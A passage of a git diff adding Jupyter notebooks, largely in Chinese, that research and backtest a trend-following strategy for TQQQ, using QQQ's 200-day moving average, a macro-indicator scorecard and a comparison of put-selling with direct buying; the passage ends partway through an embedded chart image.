pd.Timestamp.today().strftime(\"%Y-%m-%d\")\n", + "\n", + "print(\"backtest window:\", START, \"->\", END)" + ], + "execution_count": null, + "outputs": [], + "id": "895d3cf4" + }, + { + "cell_type": "code", + "metadata": {}, + "source": [ + "def load_price_series(ticker: str, start: str, end: str) -> pd.Series:\n", + " df = yf.download(ticker, start=start, end=end, auto_adjust=True, progress=False)\n", + " if df.empty:\n", + " raise ValueError(f\"no data for {ticker}\")\n", + " return df[\"Close\"].rename(ticker)\n", + "\n", + "\n", + "def load_macro_frame(tickers: list[str], start: str, end: str) -> pd.DataFrame:\n", + " cols = []\n", + " for t in tickers:\n", + " s = load_price_series(t, start, end)\n", + " cols.append(s)\n", + " out = pd.concat(cols, axis=1).sort_index()\n", + " return out" + ], + "execution_count": null, + "outputs": [], + "id": "fd3e36c0" + }, + { + "cell_type": "code", + "metadata": {}, + "source": [ + "def compute_lrs_signal(qqq_close: pd.Series) -> pd.DataFrame:\n", + " df = pd.DataFrame(index=qqq_close.index)\n", + " df[\"close\"] = qqq_close\n", + " df[\"ma200\"] = qqq_close.rolling(200).mean()\n", + " df[\"ma200_slope_20\"] = df[\"ma200\"].diff(20)\n", + "\n", + " # 方向层:站上/跌破 200MA\n", + " df[\"dir_long\"] = (df[\"close\"] > df[\"ma200\"]).astype(int)\n", + "\n", + " # 有效性:连续站上 3 日 + ma200 斜率为正\n", + " above = (df[\"close\"] > df[\"ma200\"]).astype(int)\n", + " df[\"above_3d\"] = (above.rolling(3).sum() == 3).astype(int)\n", + " df[\"valid_trend\"] = ((df[\"above_3d\"] == 1) & (df[\"ma200_slope_20\"] > 0)).astype(int)\n", + "\n", + " return df\n", + "\n", + "\n", + "def compute_macro_score(macro: pd.DataFrame) -> pd.Series:\n", + " # 这是一个 V0 占位打分函数,后续应替换为更严谨的经济含义映射\n", + " ret = macro.pct_change(5)\n", + " score = pd.Series(0, index=macro.index, dtype=float)\n", + "\n", + " # 方向示例(仅研究起点):\n", + " # - 美元走强可能压制风险资产\n", + " # - TIP 走强通常对风险偏好略正向\n", + " if \"DX-Y.NYB\" in ret.columns:\n", + " score += np.where(ret[\"DX-Y.NYB\"] < 0, 1, -1)\n", + " if \"TIP\" in ret.columns:\n", + " score += np.where(ret[\"TIP\"] > 0, 1, -1)\n", + "\n", + " return score.rename(\"macro_score\")" + ], + "execution_count": null, + "outputs": [], + "id": "67baabe3" + }, + { + "cell_type": "code", + "metadata": {}, + "source": [ + "def position_sizing(valid_signal: pd.Series, macro_score: pd.Series) -> pd.Series:\n", + " # 仓位规则 V0:\n", + " # valid_signal=1 且 macro_score>=1 -> 100%\n", + " # valid_signal=1 且 macro_score=0 -> 50%\n", + " # 其余 -> 0%\n", + " pos = pd.Series(0.0, index=valid_signal.index)\n", + " pos[(valid_signal == 1) & (macro_score >= 1)] = 1.0\n", + " pos[(valid_signal == 1) & (macro_score == 0)] = 0.5\n", + " return pos.rename(\"target_position\")\n", + "\n", + "\n", + "def backtest_tqqq(position: pd.Series, tqqq_close: pd.Series, fee_bps: float = 2.0) -> pd.DataFrame:\n", + " ret = tqqq_close.pct_change().fillna(0.0)\n", + " pos = position.reindex(ret.index).ffill().fillna(0.0)\n", + "\n", + " turnover = pos.diff().abs().fillna(0.0)\n", + " fee = turnover * (fee_bps / 10000.0)\n", + "\n", + " strat_ret = pos.shift(1).fillna(0.0) * ret - fee\n", + " eq = (1 + strat_ret).cumprod()\n", + " bh = (1 + ret).cumprod()\n", + "\n", + " out = pd.DataFrame(\n", + " {\n", + " \"ret_tqqq\": ret,\n", + " \"position\": pos,\n", + " \"turnover\": turnover,\n", + " \"fee\": fee,\n", + " \"ret_strategy\": strat_ret,\n", + " \"equity_strategy\": eq,\n", + " \"equity_buy_hold\": bh,\n", + " }\n", + " )\n", + " return out" + ], + "execution_count": null, + "outputs": [], + "id": "3f75eeec" + }, + { + "cell_type": "code", + "metadata": {}, + "source": [ + "qqq = load_price_series(QQQ, START, END)\n", + "tqqq = load_price_series(TQQQ, START, END)\n", + "macro = load_macro_frame(MACRO_TICKERS, START, END)\n", + "\n", + "sig = compute_lrs_signal(qqq)\n", + "score = compute_macro_score(macro)\n", + "\n", + "panel = sig.join(score, how=\"left\").ffill()\n", + "panel[\"target_position\"] = position_sizing(panel[\"valid_trend\"], panel[\"macro_score\"])\n", + "\n", + "bt = backtest_tqqq(panel[\"target_position\"], tqqq)\n", + "\n", + "panel.tail(), bt[[\"equity_strategy\", \"equity_buy_hold\", \"position\"]].tail()" + ], + "execution_count": null, + "outputs": [], + "id": "9883c29a" + }, + { + "cell_type": "markdown", + "metadata": {}, + "source": [ + "## 四、执行方式:直接买入 vs 卖 Put(研究设计)\n", + "\n", + "你提到“当前价格偏高时,是否应卖 Put 接盘”非常关键。建议用“条件分流”来做:\n", + "\n", + "### 条件分流规则(研究版)\n", + "\n", + "- 当 `valid_trend=1` 且价格未明显偏离(例如 close 相对 MA20 的偏离不高):`direct_buy`\n", + "- 当 `valid_trend=1` 但短期偏离过大/IV 偏高:`sell_put`\n", + "\n", + "### 回测对比维度\n", + "\n", + "1. 收益:年化、累计收益\n", + "2. 风险:最大回撤、下行波动\n", + "3. 稳定性:胜率、盈亏比、连续亏损\n", + "4. 成本:交易频次、手续费、期权滑点与行权影响\n", + "\n", + "> 注意:卖 Put 研究需要期权链与成交假设,否则结论会偏乐观。\n" + ], + "id": "d3b9da0f" + }, + { + "cell_type": "markdown", + "metadata": {}, + "source": [ + "## 五、下一步落地计划(建议按顺序)\n", + "\n", + "1. **先固化 V0 规则**:QQQ 200MA + 简单宏观过滤 + 分层仓位(不加期权)\n", + "2. **完成 2 年主回测**:输出收益/回撤/交易频次/换手\n", + "3. **专项复盘震荡窗口**:筛选 whipsaw 最严重区间,观察策略是否过度交易\n", + "4. **加入执行分流**:引入 direct_buy vs sell_put 的条件决策\n", + "5. **参数稳定性测试**:对确认天数、仓位阈值、宏观阈值做敏感性分析\n", + "\n", + "---\n", + "\n", + "### 关键原则\n", + "\n", + "- 不追求“单期最高收益”,优先“跨区间可存活”\n", + "- 每增加一个过滤器,都要验证是否真正改善风险收益比\n", + "- 对 TQQQ 这类杠杆 ETF,回撤控制优先级高于信号数量\n" + ], + "id": "f07fd291" + }, + { + "cell_type": "markdown", + "metadata": {}, + "source": [ + "## 六、补充研究:LRS 原始定义与当前真实案例(2026-04)\n", + "\n", + "### 1) LRS 的标准定义(Leverage for the Long Run)\n", + "\n", + "LRS(Leverage for the Long Run Strategy)在本研究中的最小规则为:\n", + "\n", + "| QQQ 与 200MA | 操作 |\n", + "|---|---|\n", + "| `QQQ 收盘 > 200MA` | 持有 TQQQ |\n", + "| `QQQ 收盘 < 200MA` | 清仓 TQQQ,转现金或短债 |\n", + "\n", + "该规则的核心是“只跟随趋势,不做主观预测”。\n", + "\n", + "### 2) 当前状态(教学样本)\n", + "\n", + "基于你提供的信息:\n", + "\n", + "- QQQ 近期处于约 `470-580` 区间波动\n", + "- QQQ 200 日均线约 `594`\n", + "- 当前 QQQ 低于 200MA\n", + "\n", + "在 LRS 规则下,这对应**离场状态**(risk-off),并且非常适合作为“跌破后如何等待再入场”的研究样本。\n", + "\n", + "### 3) 关键启发\n", + "\n", + "- 同样是跌破 200MA,宏观背景不同,后续路径完全不同。\n", + "- 因此 LRS 在实盘中应升级为:\n", + " - **均线给方向**\n", + " - **宏观给强弱与等待时长**\n", + " - **执行层决定买入方式与仓位节奏**\n" + ], + "id": "569dcdf9" + }, + { + "cell_type": "markdown", + "metadata": {}, + "source": [ + "## 七、六个宏观指标在 LRS 中的操作化映射\n", + "\n", + "你给出的分析非常关键:这些指标在 LRS 中不是用于“选股”,而是用于两件事:\n", + "\n", + "1. **均线信号前预警**:是否提前降仓\n", + "2. **均线信号后定性**:这次跌破是浅跌还是深跌,回仓应快还是慢\n", + "\n", + "### 指标作用与操作提示(研究版)\n", + "\n", + "| 指标 | LRS中的主作用 | 偏多/顺风 | 偏空/逆风 |\n", + "|---|---|---|---|\n", + "| `IRX` | Fed政策方向/短端利率冲击 | 平稳或下行:可提高仓位 | 快速上行:提前降仓(如100%->60%) |\n", + "| `TNX` | 科技股贴现率锚 | 高位回落:重返均线上方后可积极回仓 | 持续上行:跌破后谨慎等待 |\n", + "| `TIP` | 实际利率压力 | 止跌/回升:风险偏好改善 | 持续下跌:实际利率上升,减仓 |\n", + "| `FVX/TYX` | 曲线形态与恢复速度 | 曲线正常化:跌破后恢复可能更快 | 倒挂/长期平坦:跌破后等待更久 |\n", + "| `DX-Y.NYB` | 全球流动性与盈利折算 | 走弱/平稳:利好成长风格 | 快速走强:压制风险资产 |\n", + "\n", + "> 备注:`IRX` 在 LRS 里应被视为最高优先级观察项之一,`TNX/TIP` 为关键确认项。\n" + ], + "id": "329757cc" + }, + { + "cell_type": "markdown", + "metadata": {}, + "source": [ + "## 八、LRS 宏观记分卡(V0.2)与仓位决策\n", + "\n", + "### 1) 月初记分卡(可先手工)\n", + "\n", + "对 5 组信号打分(顺风 +1,逆风 -1,中性 0):\n", + "\n", + "- `IRX`\n", + "- `TNX`\n", + "- `TIP`\n", + "- `Curve(FVX/TYX 与 IRX-TNX形态)`\n", + "- `DXY`\n", + "\n", + "`macro_total = sum(scores)`\n", + "\n", + "### 2) 均线上方时的仓位建议(持有期)\n", + "\n", + "| 宏观顺风个数 | 建议仓位(TQQQ) | 说明 |\n", + "|---|---:|---|\n", + "| 4-5 | 100% | 让杠杆充分工作 |\n", + "| 2-3 | 60%-70% | 保留进攻,控制波动衰减 |\n", + "| 0-1 | 40%-50% 或更低 | 即便在均线上方也防守 |\n", + "\n", + "### 3) 均线跌破后的回仓等待逻辑(离场期)\n", + "\n", + "| 跌破时宏观状态 | 回仓节奏 |\n", + "|---|---|\n", + "| 顺风仍有 >=3 | 可能是情绪性下破;重新站回均线可较快回仓 |\n", + "| 逆风 >=4 | 可能是基本面驱动下跌;等待 IRX 与 TNX 同步改善再回仓 |\n", + "\n", + "### 4) 执行分流(直接买 vs 卖Put)\n", + "\n", + "在“允许回仓”的前提下:\n", + "\n", + "- **直接买入**:价格偏离不大、波动中等、趋势确认充分\n", + "- **卖 Put 接盘**:价格偏高/波动偏大,偏向等更好成本入场\n", + "\n", + "> 重要:卖 Put 需要期权链数据与成交假设,回测中必须纳入权利金、行权、保证金约束。\n" + ], + "id": "24cd2d7c" + }, + { + "cell_type": "markdown", + "metadata": {}, + "source": [ + "## 九、重点回测议程(基于你提出的问题)\n", + "\n", + "建议把回测拆成 3 条主线,每条都做 2 年主窗口 + 震荡子区间专项复盘。\n", + "\n", + "### 主线 A:有效信号过滤是否有价值\n", + "\n", + "比较:\n", + "\n", + "1. 纯 LRS(仅 QQQ vs 200MA)\n", + "2. LRS + 有效性过滤(连续站上N日、MA200斜率)\n", + "3. LRS + 有效性 + 宏观记分卡\n", + "\n", + "观察:收益、最大回撤、交易次数、Calmar、横盘期表现。\n", + "\n", + "### 主线 B:执行方式比较(直接买 vs 卖Put)\n", + "\n", + "比较:\n", + "\n", + "1. 全部 direct_buy\n", + "2. 条件分流 direct_buy/sell_put\n", + "\n", + "观察:收益差、回撤差、资金占用、尾部风险(急跌时)。\n", + "\n", + "### 主线 C:仓位管理鲁棒性\n", + "\n", + "比较:\n", + "\n", + "1. 满仓策略\n", + "2. 分层仓位策略(40/70/100)\n", + "\n", + "观察:是否显著降低 TQQQ 在震荡期的净值磨损。\n", + "\n", + "---\n", + "\n", + "## 十、策略框架结论(当前版本)\n", + "\n", + "你提出的方向非常正确:LRS 不应停留在“均线二元开关”。\n", + "\n", + "当前建议的最小可交易框架是:\n", + "\n", + "- **方向**:QQQ 200MA\n", + "- **过滤**:有效性 + 宏观记分卡\n", + "- **执行**:direct_buy / sell_put 分流\n", + "- **风控**:分层仓位 + 震荡降频\n", + "\n", + "这套框架可直接作为策略页下一步实现蓝图:\n", + "\n", + "1. 先做无期权版(direct_buy)\n", + "2. 再叠加期权执行分支\n", + "3. 最后做参数稳定性与样本外验证\n", + "" + ], + "id": "c7ee5dac" + } + ], + "metadata": { + "kernelspec": { + "display_name": "Python 3", + "language": "python", + "name": "python3" + }, + "language_info": { + "name": "python" + } + }, + "nbformat": 4, + "nbformat_minor": 5 +} \ No newline at end of file diff --git a/docs/LRS_notebooks/lrs_tqqq_today_open_decision.ipynb b/docs/LRS_notebooks/lrs_tqqq_today_open_decision.ipynb new file mode 100644 index 0000000..f021a1d --- /dev/null +++ b/docs/LRS_notebooks/lrs_tqqq_today_open_decision.ipynb @@ -0,0 +1,1496 @@ +{ + "cells": [ + { + "cell_type": "markdown", + "id": "0438615a", + "metadata": {}, + "source": [ + "# LRS TQQQ 当日开仓决策 Notebook\n", + "\n", + "> 目标:基于 LRS 框架,对“今天是否适合开仓 TQQQ”做结构化判断。\n", + "\n", + "分析结构:\n", + "\n", + "1. 基础信号(QQQ vs 200MA)\n", + "2. 有效性判断(信号是否可靠)\n", + "3. 宏观过滤层(6 指标)\n", + "4. 执行层(直接买入 vs 卖 Put)\n", + "5. 风控层(给出建议仓位)" + ] + }, + { + "cell_type": "code", + "execution_count": 1, + "id": "e0a490e4", + "metadata": {}, + "outputs": [ + { + "name": "stdout", + "output_type": "stream", + "text": [ + "window: 2024-04-13 -> 2026-04-13\n" + ] + } + ], + "source": [ + "import numpy as np\n", + "import pandas as pd\n", + "import yfinance as yf\n", + "import matplotlib.pyplot as plt\n", + "\n", + "plt.style.use(\"seaborn-v0_8-darkgrid\")\n", + "\n", + "QQQ = \"QQQ\"\n", + "TQQQ = \"TQQQ\"\n", + "MACRO_TICKERS = [\"^IRX\", \"^FVX\", \"^TNX\", \"^TYX\", \"DX-Y.NYB\", \"TIP\"]\n", + "\n", + "LOOKBACK_YEARS = 2\n", + "START = (pd.Timestamp.today() - pd.DateOffset(years=LOOKBACK_YEARS)).strftime(\"%Y-%m-%d\")\n", + "END = pd.Timestamp.today().strftime(\"%Y-%m-%d\")\n", + "\n", + "print(f\"window: {START} -> {END}\")" + ] + }, + { + "cell_type": "code", + "execution_count": 2, + "id": "12933e39", + "metadata": {}, + "outputs": [ + { + "name": "stdout", + "output_type": "stream", + "text": [ + "QQQ last: 611.07\n", + "TQQQ last: 49.17\n", + "macro columns: ['^IRX', '^FVX', '^TNX', '^TYX', 'DX-Y.NYB', 'TIP']\n" + ] + }, + { + "name": "stdout", + "output_type": "stream", + "text": [ + "/var/folders/96/_n1lf8k53dxg2d2mxxmwwjl80000gn/T/ipykernel_21785/1197174451.py:18: FutureWarning: Calling float on a single element Series is deprecated and will raise a TypeError in the future. Use float(ser.iloc[0]) instead\n", + " print(\"QQQ last:\", round(float(qqq.iloc[-1]), 2))\n", + "/var/folders/96/_n1lf8k53dxg2d2mxxmwwjl80000gn/T/ipykernel_21785/1197174451.py:19: FutureWarning: Calling float on a single element Series is deprecated and will raise a TypeError in the future. Use float(ser.iloc[0]) instead\n", + " print(\"TQQQ last:\", round(float(tqqq.iloc[-1]), 2))\n" + ] + } + ], + "source": [ + "def load_close(ticker: str, start: str, end: str) -> pd.Series:\n", + " df = yf.download(ticker, start=start, end=end, auto_adjust=True, progress=False)\n", + " if df.empty:\n", + " raise ValueError(f\"no data for {ticker}\")\n", + " s = df[\"Close\"].copy()\n", + " s.name = ticker\n", + " return s\n", + "\n", + "\n", + "def safe_pct_change(s: pd.Series, n: int = 1) -> pd.Series:\n", + " return s.pct_change(n).replace([np.inf, -np.inf], np.nan)\n", + "\n", + "\n", + "qqq = load_close(QQQ, START, END)\n", + "tqqq = load_close(TQQQ, START, END)\n", + "macro = pd.concat([load_close(t, START, END) for t in MACRO_TICKERS], axis=1)\n", + "\n", + "print(\"QQQ last:\", round(float(qqq.iloc[-1]), 2))\n", + "print(\"TQQQ last:\", round(float(tqqq.iloc[-1]), 2))\n", + "print(\"macro columns:\", list(macro.columns))" + ] + }, + { + "cell_type": "markdown", + "id": "70db13c5", + "metadata": {}, + "source": [ + "## 1) 基础信号:QQQ vs 200MA\n", + "\n", + "### 逻辑说明\n", + "\n", + "LRS 的最基础规则:\n", + "\n", + "- `QQQ 收盘 > MA200`:多头可开仓(方向允许)\n", + "- `QQQ 收盘 < MA200`:不开新仓/维持离场(方向不允许)\n", + "\n", + "这一步只回答“方向是否允许”,不回答“是否立刻重仓”。" + ] + }, + { + "cell_type": "code", + "execution_count": 3, + "id": "7162cda9", + "metadata": {}, + "outputs": [ + { + "name": "stdout", + "output_type": "stream", + "text": [ + "today close: 611.07\n", + "today ma200: 595.32\n", + "distance %: 2.65\n", + "base signal: LONG_ALLOWED\n" + ] + } + ], + "source": [ + "sig = pd.DataFrame(index=qqq.index)\n", + "sig[\"close\"] = qqq\n", + "sig[\"ma200\"] = qqq.rolling(200).mean()\n", + "sig[\"distance_pct\"] = (sig[\"close\"] / sig[\"ma200\"] - 1) * 100\n", + "sig[\"base_long\"] = (sig[\"close\"] > sig[\"ma200\"]).astype(int)\n", + "\n", + "today = sig.dropna().iloc[-1]\n", + "print(\"today close:\", round(float(today[\"close\"]), 2))\n", + "print(\"today ma200:\", round(float(today[\"ma200\"]), 2))\n", + "print(\"distance %:\", round(float(today[\"distance_pct\"]), 2))\n", + "print(\"base signal:\", \"LONG_ALLOWED\" if int(today[\"base_long\"]) == 1 else \"RISK_OFF\")" + ] + }, + { + "cell_type": "code", + "execution_count": 4, + "id": "d9366ee5", + "metadata": {}, + "outputs": [ + { + "data": { + "image/png": "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o7YEz7LsQErSJaCVudO9XSUgI+Kkcd6rr77aq89DREQMoomIiIiIiIg6jCOuiIiIiIiIiDqIQTQRERERERFRBzGIJiIiIiIiIuogBtFEREREREREHRQAL1VaWtsnzxMXF46Kivo+eS7qOu4n38F95Vu4v7wf95Fv4H7yHdxXvoP7yvvF9cN9lJgYedDbDOhMtEyb0On81Sl5L+4n38F95Vu4v7wf95Fv4H7yHdxXvoP7yvv5DeB9NKCDaCIiIiIiIqLOYBBNRERERERE1EEMoomIiIiIiIg6iEE0ERERERERUQcxiCYiIiIiIiLqIAbRRERERERERB3EIJqIiIiIiIiogxhEExEREREREXUQg2giIiIiIiKiDmIQTURERERERNRBDKKJiIiIiIiIOiigozek7qusrMCbb76KxYsXoaqqEqmp6TjhhJNxzjnnIyDAdVfk5+fhjTdewcqVy1FfX4esrEE444yzcdJJp7Z63F27dqjbbtiwHgaDAUOHDsP551+Mww47/KDbtGzZErz//tvYuXM7AgMDMX78JFx99V8wePAQdf2rr76IdevW4NlnX+rBd4KIiIiIiMg3MRPdR0pLS3D11X/CgQM5uPvuB/D22x/hssuuxGeffYR//vNmWCwWx213796Fq666FCaTCY888l+8+eYHOP30s/Dcc8/g0UcfdHncVatW4Nprr0BSUgqeeuo5vPL